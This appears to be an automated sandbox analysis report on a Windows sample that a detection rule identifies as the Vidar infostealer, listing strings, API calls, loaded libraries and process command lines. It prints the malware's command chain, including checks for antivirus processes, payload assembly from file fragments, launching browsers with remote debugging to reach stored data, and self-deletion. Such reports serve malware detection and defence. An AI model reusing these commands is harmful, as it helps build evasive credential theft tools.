                Source: chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Char
                Source: chrome.exe, 00000010.00000002.2709149181.00007C1C0080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/CharPk3
                Source: chrome.exe, 00000010.00000002.2715372641.00007C1C01044000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
                Source: chrome.exe, 00000010.00000002.2715472427.00007C1C010D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                Source: chrome.exe, 00000010.00000002.2714984926.00007C1C00F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2710626632.00007C1C00948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2709028513.00007C1C007D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                Source: chrome.exe, 00000010.00000002.2714984926.00007C1C00F28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2710626632.00007C1C00948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2709028513.00007C1C007D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                Source: Pokemon.com, 0000000C.00000002.3074481165.0000000004210000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3078503305.000000000671B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706664303.00007C1C00500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712460317.00007C1C00B50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmp, K6XB16.12.dr, Web Data.22.dr, WLFCTJ.12.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsights
                Source: chrome.exe, 00000010.00000002.2706334888.00007C1C00428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2669760383.00007C1C02C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2670976589.00007C1C02C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                Source: chrome.exe, 00000010.00000003.2670389834.00007C1C02C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49760 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 116.203.8.178:443 -> 192.168.2.5:49766 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 116.203.8.178:443 -> 192.168.2.5:50001 version: TLS 1.2
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Code function: 12_2_0010F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Code function: 12_2_0010F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Code function: 12_2_00129FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                System Summary

                Source: 12.2.Pokemon.com.4230000.1.unpack, type: UNPACKEDPE Matched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Code function: 12_2_00104763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Code function: 12_2_000F1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Code function: 12_2_000FF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe File created: C:\Windows\BathAssessed
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe File created: C:\Windows\OeEl
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe File created: C:\Windows\ProperlyConsumer
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe File created: C:\Windows\MagnetBeginners
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe File created: C:\Windows\GccFactors
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe File created: C:\Windows\EaseFinal
                Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe Code function: String function: 004062CF appears 58 times
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Code function: String function: 000AFD52 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Code function: String function: 000B0DA0 appears 46 times
                Source: JA7cOAGHym.exe Static PE information: invalid certificate
                Source: JA7cOAGHym.exe, 00000000.00000003.2026333690.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs JA7cOAGHym.exe
                Source: JA7cOAGHym.exe, 00000000.00000002.2027402695.0000000000878000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs JA7cOAGHym.exe
                Source: JA7cOAGHym.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 12.2.Pokemon.com.4230000.1.unpack, type: UNPACKEDPE Matched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@89/290@21/16
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Code function: 12_2_001041FA GetLastError,FormatMessageW
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Code function: 12_2_000F2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Code function: 12_2_000F1A0B AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Code function: 12_2_000FDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe Code function: 0_2_004024FB CoCreateInstance
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Code function: 12_2_00103A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\QIWZO93Q.htm
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5368:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1120:120:WilError_03
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe File created: C:\Users\user\AppData\Local\Temp\nsw163E.tmp
                Source: JA7cOAGHym.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                Source: IEUAAIW47.12.dr, N7YMYCBSR.12.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: JA7cOAGHym.exe Virustotal: Detection: 40%
                Source: JA7cOAGHym.exe ReversingLabs: Detection: 28%
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe File read: C:\Users\user\Desktop\JA7cOAGHym.exe
                Source: unknown Process created: C:\Users\user\Desktop\JA7cOAGHym.exe "C:\Users\user\Desktop\JA7cOAGHym.exe"
                Source: C:\Users\user\Desktop\JA7cOAGHym.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Brisbane Brisbane.cmd & Brisbane.cmd
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 208079
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Validation
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "SAO" Offering
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Involve + ..\Iso + ..\Leo + ..\Viewpicture y
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\208079\Pokemon.com Pokemon.com y
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 --field-trial-handle=2320,i,6168099794620049130,9093318800782108175,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2756 --field-trial-handle=2520,i,17626979648747034904,9426378667772117242,262144 /prefetch:3
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2860 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6896 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6980 --field-trial-handle=2116,i,16355432943838748854,2832790801878657825,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\208079\Pokemon.com" & rd /s /q "C:\ProgramData\79RQ1VS0ZU3E" & exit
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\JA7cOAGHym.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\208079\Pokemon.comSection loaded: ntshrui.dllJump to behavior
